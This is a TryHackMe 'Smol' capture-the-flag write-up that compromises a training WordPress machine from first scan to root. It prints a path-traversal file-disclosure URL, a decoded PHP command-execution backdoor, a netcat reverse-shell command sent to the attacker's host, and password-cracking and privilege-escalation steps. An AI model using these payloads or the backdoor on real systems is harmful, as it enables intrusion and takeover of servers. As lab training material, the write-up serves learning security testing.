Smol: TryHackMe Writeup

8 min readJan 27, 2025

Smol, but Mighty: 🔍 A WordPress Hacking Adventure

Imagine you’re on a treasure hunt 🏴‍☠️, but instead of a map, you have an Nmap scan, and instead of gold, you’re after root access. Welcome to Smol, a TryHackMe room that packs a punch despite its name. Let’s dive in! 🚀

At the heart of Smol is a WordPress website, a common target due to its extensive plugin ecosystem. The machine showcases a publicly known vulnerable plugin, highlighting the risks of neglecting software updates and security patches. Enhancing the learning experience, Smol introduces a backdoored plugin, emphasizing the significance of meticulous code inspection before integrating third-party components.

For a full detailed walkthrough of the TryHackMe Smol room, including flag answers and passwords, read the complete article at: Smol TryHackMe Writeup with answers.

🕵️‍♂️ Step 1: Scanning for Clues

First things first, we need to check what’s out there. Visiting the site reals the webpage as shown below:

Furthermore, A good old-fashioned Nmap scan reveals two interesting ports:

22 (SSH) 🔑 — Always a solid find but not our first target.
80 (HTTP) 🌐 — Hosting a WordPress site? Now, that’s promising.

Adding smol.thm to our hosts file (/etc/hosts) allows us to browse the site smoothly. 🖥️

🛠️ Step 2: WordPress — The Gift That Keeps on Giving

A quick visit to the site confirms it’s running WordPress, which means wpscan is our best friend. 🤝

wpscan --url http://www.smol.thm/

Boom! 💥We spot the jsmol2wp v1.07 plugin, which has a delightful little vulnerability (CVE-2018–20463). This flaw allows us to disclose files on the server, and our first target is the wp-config.php file. Navigate to https://github.com/sullo/advisory-archives/blob/master/wordpress-jsmol2wp-CVE-2018-20463-CVE-2018-20462.txt where you can find below code to exploit this vulnerability in the plugin:

So modify this url according to our requirement and visiting it gives us further information. The CVE CVE-2018–20463, is both an SSRF and a file disclosure vulnerability:

http://www.smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php

As show below in the image, the file gives us database credentials 🎯 for a user which is wpuser with the kbLSF2Vop#lw3rjDZ629*Z%G, and we can log in to WordPress using this credentials:

You can test these credentials at http://www.smol.thm/wp-login.php.

We get a dashboard for us to further investigate:

Wrapping up this step. We extract database credentials, log into WordPress, and stumble upon a to-do list. It casually mentions a potential backdoor in the Hello Dolly plugin. That’s our golden ticket. 🎟️

🎭 Step 3: Exploiting the Backdoor

Next going to pages in the left panel in the WordPress dashboard and then checking out the Webmaster tasks reveals a potential backdoor in the Hello Dolly plugin:

Leveraging the file disclosure vulnerability, we can examine the source code of the Hello Dolly plugin by sending a request to:

http://www.smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-content/plugins/hello.php

We pull up the Hello Dolly plugin’s code and find something suspicious: 👀

eval(base64_decode('CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZkXDE0NCJdKTsgfSA='));

As this is in base64 we can decode it by visiting cyberchef:

Next i asked ChatGPT what the decoded value meant:

if (isset($_GET["\143\155\x64"])) { system($_GET["\143\x6d\144"]); }

How It Works in Practice:
1. If an attacker visits: http://target.com/vulnerable.php?cmd=whoami
2. The script will execute: system(“whoami”);
3. Returning the current user.
Why Is This Dangerous?
1. This creates a remote command execution (RCE) vulnerability.
2. An attacker can run any system command, potentially gaining full control of the server.

Decoding this reveals a command execution backdoor, triggered via the cmd GET parameter. That’s our in! 🛠️. To obtain the shell, we can start a netcat listener on port 4444. Then, using the busybox and the vulnerability in the cmd parameter we discovered earlier, we visit the following link:

http://www.smol.thm/wp-admin/index.php/?cmd=busybox nc YOUR_MACHINE_IP 4444 -e bash

Start the nc listener as:

And visit the site:

We successfully launched a reverse shell: 🐚

And just like that, we’re in as www-data. Time to climb the privilege ladder! 🧗‍♂️. Now just stabilize the shell and to do so you can read my blog on: How to stabilize a shell like a Pro!

🔝 Step 4: Privilege Escalation — Because We Want It All

Upon getting the stabilized shell, we can use the database credentials to get other user password hashes. Simply type:

mysql -u wpuser -p'kbLSF2Vop#lw3rjDZ629*Z%G' -D wordpress

Upon checking the WordPress database we see a table containing user password hashes:

🔐 Phase 1: Cracking Passwords

Inside the WordPress database, we extract user hashes. Feeding them to John the Ripper cracks the password for user diego. 🏆

$ john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

So next we switch to user Diego where we get the user.txt that is our first flag!!!! YAYYY!!!!!!

🔑 Phase 2: SSH Key Jackpot

Switching to diego, we poke around and find an SSH private key for another user, think. Using it, we log in as think. 🏗️

We can simply use this private key with SSH to gain a shell as think user. Simply type the following command after navigating to the /home/think/.ssh directory:

$ ssh -i id_rsa think@smol.thm

🛑 Phase 3: Bypassing PAM Rules

Reading the PAM configuration for su, we notice that think can escalate to gege without a password. Easy win. 🎰

think@smol:~$ cat /etc/pam.d/su
...
auth  [success=ignore default=1] pam_succeed_if.so user = gege
auth  sufficient                 pam_succeed_if.so use_uid user = think
...

$ su - gege

📂 Phase 4: Cracking an Encrypted ZIP

Discovering an Interesting File: After checking the home directory of the gege user, we stumble upon a ZIP archive named wordpress.old.zip.

gege@smol:~$ ls -la /home/gege
total 31532
drwxr-x--- 2 gege internal     4096 Aug 18  2023 .
drwxr-xr-x 6 root root         4096 Aug 16  2023 ..
lrwxrwxrwx 1 root root            9 Aug 18  2023 .bash_history -> /dev/null
-rw-r--r-- 1 gege gege          220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 gege gege         3771 Feb 25  2020 .bashrc
-rw-r--r-- 1 gege gege          807 Feb 25  2020 .profile
lrwxrwxrwx 1 root root            9 Aug 18  2023 .viminfo -> /dev/null
-rwxr-x--- 1 root gege     32266546 Aug 16  2023 wordpress.old.zip

Since we don’t have direct access to this file from our machine, we can transfer it using a simple Python HTTP server.

Transferring the ZIP Archive

We start an HTTP server on the target system:

gege@smol:~$ python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...

Then, on our local machine, we download the file:

$ wget http://smol.thm:8080/wordpress.old.zip

As gege, we find an encrypted ZIP file containing important WordPress files. We use zip2john and John the Ripper again to crack the password. 🔓. The ZIP archive is password-protected, preventing extraction. To crack it, we first generate a hash using zip2john and then run john with the rockyou.txt wordlist, successfully retrieving the password. This is shown below:

zip2john wordpress.old.zip > wordpress_hash

Using this password we can unzip the wordpress zip file:

Exploring the wp-config.php, you get the credentials for xavi:

👑 Phase 5: Final Sudo Privileges

Using the password obtained we log in as xavi user and upon checking the sudo privileges for the xavi user, we see that the user has full privileges:

Inside the extracted files, we retrieve credentials that let us execute a sudo command to become root. 🏅

$ sudo -l
$ sudo /bin/bash

Boom. 💣 We’re root. Game over. 🎉

📚 Lessons Learned

🔍 Always scan thoroughly — Enumerating everything is key.
🔌 Plugins can be your best friend (or worst enemy) — Keep them updated!
🛡️ Privilege escalation isn’t always about exploits — Sometimes, simple misconfigurations are all you need.
📜 Never underestimate a to-do list — If an admin is worried about a backdoor, it’s probably worth checking out.

TryHackMe’s Smol room proves that even small vulnerabilities can lead to big wins. 🏆 Happy hacking! 🕶️

Thank you!